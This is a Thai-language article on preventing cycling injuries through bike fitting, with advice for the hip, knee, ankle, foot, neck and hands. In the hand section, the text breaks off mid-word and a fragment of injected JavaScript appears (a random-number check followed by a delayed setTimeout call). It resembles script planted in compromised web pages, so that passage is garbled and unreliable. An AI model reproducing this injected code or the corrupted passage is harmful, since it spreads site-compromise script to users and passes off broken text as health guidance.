ถ้าถามว่าอะไรคือการป้องกันอาการบาดเจ็บจากการปั่นจักรยานที่ดีที่สุด…ก็จะขอตอบว่า การป้องกันอาการบาดเจ็บที่ดีที่สุด เริ่มจากการทำ Bike Fitting เป็นสิ่งที่ควรทำเป็นอยากยิ่งหลังจากที่เราประกอบจักรยานเสร็จเรียบร้อย เป็นการปรับจูนรถให้เข้ากับสรีระของนักปั่น ความสูงของเบาะ ระยะความยาวระหว่างแฮนด์ปั่นจักรยานกับเบาะ หรือความกว้างของแฮนด์ล้วนมีผลต่อการปั่นจักรยานทั้งสิ้น
จุดประสงค์ของการทำ Bike Fitting ก็คือการปรับองศาหรือตำแหน่งผู้ปั่นบนจักรยานให้อยู่ในท่วงท่าที่สบายมากที่สุด แต่ในขณะเดียวกันก็เป็นองศาที่ผู้ปั่นสามารถปั่นได้อย่างมีประสิทธิภาพสูงสุด มีการปั่นที่ไหลลื่น และที่สำคัญช่วยลดอาการบาดเจ็บ การทำ Bike Fitting เป็นเรื่องที่เกี่ยวกับ Biomechanics การทำงานที่สัมพันธ์กันระหว่างมัดกล้ามเนื้อ และข้อต่อต่างๆ การเซตอัพจักรยานจะทำให้ร่างกายอยู่บนจักรยานในตำแหน่งที่เหมาะสม ช่วยลดแรงดหลดที่กระทำต่อกระดูก กล้ามเนื้อและข้อต่อต่างๆ ลดลง ให้ร่างกายสามารถยืดเหยียดได้คล่องตัว สบายตัว
เมื่ออยู่ในตำแหน่งองศาที่ถูกต้อง การทำงานกล้ามเนื้อก็จะถูกใช้งานส่งถ่ายพลังงานได้เต็มที่ ไหลลื่น ผู้ปั่นก็สามารถพัฒนาเทคนิคการปั่นได้อย่างมั่นใจ สบายใจ
อาการบาดเจ็บต่างๆ ที่จะเกิดขึ้นตามมาหลังจากการทำ Bike Fitting อย่างเช่น การใช้งานกล้ามเนื้อมากเกินไป กล้ามเนื้อยังไม่สามารถพัฒนาให้รองรับกับโหลดที่มากขึ้นในระยะเวลาอันสั้น หรือเกิดจากกล้ามเนื้อไม่มีความแข็งแรงและยืดหยุ่น หรือไม่ก็เกิดจากอุปกรณ์ที่ใช้ไม่เหมาะสมก็เป็นได้
เรามาดูจุดที่นักปั่นมักเกิดอาการบาดเจ็บกันว่ามีอะไรบ้างและเราสามารถแก้หรือป้องกันได้อย่างไร
1. เอวหรือ Hip สาเหตุการเจ็บอาจเกิดจากการปั่นเกียร์สูงนานเกินไป แนะนำให้ใช้วิธีควงขาทำรอบปั่น เพื่อลดแรงเครียดจากการใช้เกียร์สูงที่จะกดลงบนกล้ามเนื้อเอว
2. เข่า หรือ Knee สาเหตุอาจเกิดจากการปรับความสูงของเปาะนั่งไม่เหมาะสม สูงหรือต่ำเกินไป สามารถแก้ด้วยการทำ Bike Fitting ใหม่ นอกจากนี้อาจจะเกิดจากกล้ามเนื้อช่วงก้น พวกชุดกล้ามเนื้อ Gluteus ดังนั้นจึงควรมีฝึก Strength training ควบคู่กับการฝึกปั่นด้วย
3. ข้อเท้าหรือ ankle สาเหตุอาจเกิดจาก ตำแหน่งเท้าและปั่นไดปั่นไม่สัมพันธ์กัน ล่ำไปข้างหน้าหรือหลัง โดยเฉพาะบริเวณ Ball of Foot ไม่ตรงกับจุดกดของปั่นไดปั่น ทำให้เราต้องเกรงเท้าใช้กล้ามเนื้อตลอดเวลา การแก้ไขก็ลองปรับตำแหน่งครีตและปั่นไดปั่นใหม่ และอย่าลืมฝึกและคล้ายกล้ามเนื้อชุด Claves ด้วย
4. เท้าหรือ Footอาการเจ็บฝ่าเท้า นอกจากจะเกิดจากตำแหน่ง Ball of Foot ไม่สมดุลแล้ว อาจจะเกิดจากการใช้รองเท้าที่คับหรือรัดแน่จนเกินไป ใช้รองเท้าที่มีความ Stiffness สูง เราควรมีห้องให้เท้าได้เคลื่อนไหวบ้าง การปั่นนานเกินไปก็มีผลต่อฝ่าเท้าเช่นกัน ลองเปลี่ยนการปั่นมาเป็นกีฬาแบบอื่นบ้างให้เท้าได้ใช้กล้ามเนื้อในแบที่หลายหลาย นวดและคล้ายกล้ามเนื้อฝ่าเท้าโดยใช้ลูกบอลหรือลูกเทนนิส
5. คอหรือ neck อาการปวดอาจะเกิดจาก การก้มพุ่งไปข้างหน้ามากไป เพื่อทำความเร็วหลายคนอาจจะก้มเพื่อให้เกิดแอร์โรไดนามิกมากที่สุด แต่ก็ควรปรับเปลี่ยนอิริยาบถดูบ้าง ระยะห่างระหว่างเป่าะนั่งและแฮนด์ก็มีผลเช่นกัน เวลาแก้ปวดเราก็ควรบริหารกล้ามเนื้อโดยการหมุนคอเบาๆ และค้างไว อย่างเช่น ไปด้านซ้าย 5 วินาที ขวา 5 วินาที ก้มหน้าค้างและเงยหน้าค้างสลับกัน
6. มือหรือ Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and อาจจะเกิดจากองศาการจับไม่ถูกต้องหรือนานเกินไป นักปั่นอาจจะกำแน่นกดแรง หรือมีแรงกดที่ถ่ายเทมาจากส่วน Upper Body อันเนื่องมากจากตำแหน่ง Bike Fitting ผิดหรือกล้ามเนื้อบริเวณ Core และ Upper ไม่แข็งแรง ทำให้น้ำหนักเทลงมาที่มือ